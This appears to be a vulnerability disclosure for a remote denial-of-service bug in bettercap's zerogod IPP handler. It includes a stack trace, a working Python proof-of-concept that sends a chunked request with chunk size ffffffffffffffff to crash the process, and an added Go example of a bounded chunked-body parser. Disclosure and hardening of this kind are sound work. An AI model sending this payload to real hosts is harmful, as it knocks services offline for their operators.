| Title | bettercap <=v2.41.5 Integer Coercion Error |
|---|---|
| Description | zerogod IPP Chunked Body - Unrecovered Panic via OOB uint64 Allocation |

The `zerogod IPP` handler crashes the entire process on a crafted chunked request (remote DoS). @evilsocket
### Environment
- Bettercap version: v2.41.5 (bettercap -version)
- OS: Linux (tested on Kali 6.18.12 amd64; issue is OS-independent)
- Go version: go1.26.1
- Command line:
```
sudo bettercap -iface eth0 -eval "zerogod.advertise /path/to/services.yaml"
```
- Caplet / session commands: none beyond the eval above
- services.yaml:
```
- name: "My Printer"
  service: "_ipp._tcp."
  domain: "local"
  port: 63100
  ipp:
    printer-name: "My Printer"
    printer-info: "Test"
    printer-make-and-model: "Test Make Test Model"
    printer-location: "Office"
```
```
[zerogod] found tcp _ipp._tcp.local protocol handler (tls=false)
[zerogod] advertising My Printer._ipp._tcp.local with hostname=kali ipv4=192.168.1.x port=63100
[zerogod] 127.0.0.1 ->
panic: runtime error: makeslice: len out of range
goroutine 65 [running]:
github.com/bettercap/bettercap/v2/modules/zerogod.ippReadChunkedBody(0x2a03cf542cc0)
.../modules/zerogod/zerogod_ipp_primitives.go:140 +0xa5
github.com/bettercap/bettercap/v2/modules/zerogod.ippReadRequestBody(0x2a03cf542cc0, 0x2a03cf56f2c0)
.../modules/zerogod/zerogod_ipp_primitives.go:166 +0x1fd
github.com/bettercap/bettercap/v2/modules/zerogod.ippClientHandler(0x2a03cf542cc0)
.../modules/zerogod/zerogod_ipp_handler.go:50 +0x29a
created by github.com/bettercap/bettercap/v2/modules/zerogod.(*Acceptor).startTCP.func1 in goroutine 61
.../modules/zerogod/zerogod_acceptor.go:120 +0x53a
```
### Steps to Reproduce
1. Start bettercap with zerogod advertising any IPP service (see YAML above).
2. Confirm the IPP TCP port is listening (ss -tlnp | grep 63100).
3. From any machine on the same network, run the following Python snippet:
```
import socket, time
s = socket.socket()
s.connect(("192.168.1.x", 63100)) # replace with bettercap host IP
# Step 1 – send HTTP request with Expect: 100-continue + Transfer-Encoding: chunked
s.sendall(
b"POST /ipp HTTP/1.1\r\n"
b"Host: 192.168.1.x:63100\r\n"
b"Content-Type: application/ipp\r\n"
b"Transfer-Encoding: chunked\r\n"
b"Expect: 100-continue\r\n"
b"\r\n"
)
# Step 2 – wait for 100 Continue, then send uint64-max as chunk size
print(s.recv(4096)) # b'HTTP/1.1 100 Continue\r\n\r\n'
s.sendall(b"ffffffffffffffff\r\n") # triggers make([]byte, uint64(max)) → panic
```

| Source | https://github.com/bettercap/bettercap/issues/1263 |
|---|---|
| User | dapickle (UID 97309) |
| Submission | 23/04/2026 08:49 AM (1 month ago) |
| Moderation | 10/05/2026 06:05 PM (17 days later) |
| Status | Accepted |
| VulDB Entry | 362572 [bettercap up to 2.41.5 zerogod IPP Service zerogod_ipp_primitives.go ippReadChunkedBody denial of service] |
| Points | 20 |
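The report attributes the crash to a chunk-size value that is parsed as a uint64 and handed straight to `make([]byte, n)`, which the Go runtime rejects with `makeslice: len out of range`. The following is an added example, not bettercap's code (the project's actual parser is not shown on this page), of how a defender would write a chunked-body reader that validates the chunk-size line before any allocation. The limits `maxChunkSize` and `maxBodySize`, the function names, and the error values are assumptions chosen for this illustration; the input `ffffffffffffffff` is the exact line from the report and is turned into an ordinary error rather than a process-wide panic.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// Caps are example values chosen for this illustration (assumption, not
// bettercap's settings). IPP requests are small, so larger input is rejected.
const (
	maxChunkSize = 1 << 20 // 1 MiB per chunk
	maxBodySize  = 4 << 20 // 4 MiB per request body
)

var (
	ErrBadChunkSize  = errors.New("chunked body: malformed chunk-size line")
	ErrChunkTooLarge = errors.New("chunked body: chunk size exceeds limit")
	ErrBodyTooLarge  = errors.New("chunked body: total body exceeds limit")
)

// parseChunkSize reads one chunk-size line ("<hex>[;ext]\r\n") and validates it
// before the caller allocates anything. Values that overflow uint64 are rejected
// by ParseUint; values that fit but exceed maxChunkSize (such as ffffffffffffffff
// from the report) are rejected by the explicit cap.
func parseChunkSize(r *bufio.Reader) (int, error) {
	line, err := r.ReadString('\n')
	if err != nil {
		return 0, err
	}
	line = strings.TrimRight(line, "\r\n")
	if i := strings.IndexByte(line, ';'); i >= 0 { // drop chunk extensions
		line = line[:i]
	}
	line = strings.TrimSpace(line)
	if line == "" {
		return 0, ErrBadChunkSize
	}
	n, err := strconv.ParseUint(line, 16, 64)
	if err != nil {
		return 0, ErrBadChunkSize
	}
	if n > maxChunkSize {
		return 0, ErrChunkTooLarge
	}
	return int(n), nil
}

// readChunkedBody decodes a chunked transfer-coded body with per-chunk and
// total-size limits, returning an error instead of panicking on bad input.
func readChunkedBody(r *bufio.Reader) ([]byte, error) {
	body := make([]byte, 0, 512)
	for {
		size, err := parseChunkSize(r)
		if err != nil {
			return nil, err
		}
		if size == 0 {
			// Last chunk: skip any trailer lines up to the terminating empty line.
			for {
				line, err := r.ReadString('\n')
				if err != nil {
					return nil, err
				}
				if strings.TrimRight(line, "\r\n") == "" {
					return body, nil
				}
			}
		}
		if len(body)+size > maxBodySize {
			return nil, ErrBodyTooLarge
		}
		buf := make([]byte, size) // size is already bounded by maxChunkSize
		if _, err := io.ReadFull(r, buf); err != nil {
			return nil, err
		}
		body = append(body, buf...)
		var crlf [2]byte // each chunk's data is followed by CRLF
		if _, err := io.ReadFull(r, crlf[:]); err != nil {
			return nil, err
		}
		if crlf != [2]byte{'\r', '\n'} {
			return nil, ErrBadChunkSize
		}
	}
}

// decodeChunked is a convenience wrapper over an in-memory string.
func decodeChunked(raw string) ([]byte, error) {
	return readChunkedBody(bufio.NewReader(strings.NewReader(raw)))
}

func main() {
	// Constructed inputs: a well-formed body and the oversized chunk size from the report.
	good := "5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n"
	evil := "ffffffffffffffff\r\n"
	b, err := decodeChunked(good)
	fmt.Printf("good: %q err=%v\n", b, err)
	_, err = decodeChunked(evil)
	fmt.Printf("evil: err=%v\n", err)
}
```

The two checks are deliberately separate: `strconv.ParseUint` catches hex strings that do not fit in 64 bits, while the explicit cap catches values that parse fine but would still exhaust memory or trip the runtime's length check. A per-connection error is then logged and the connection closed, leaving the other goroutines (and the advertised service) running.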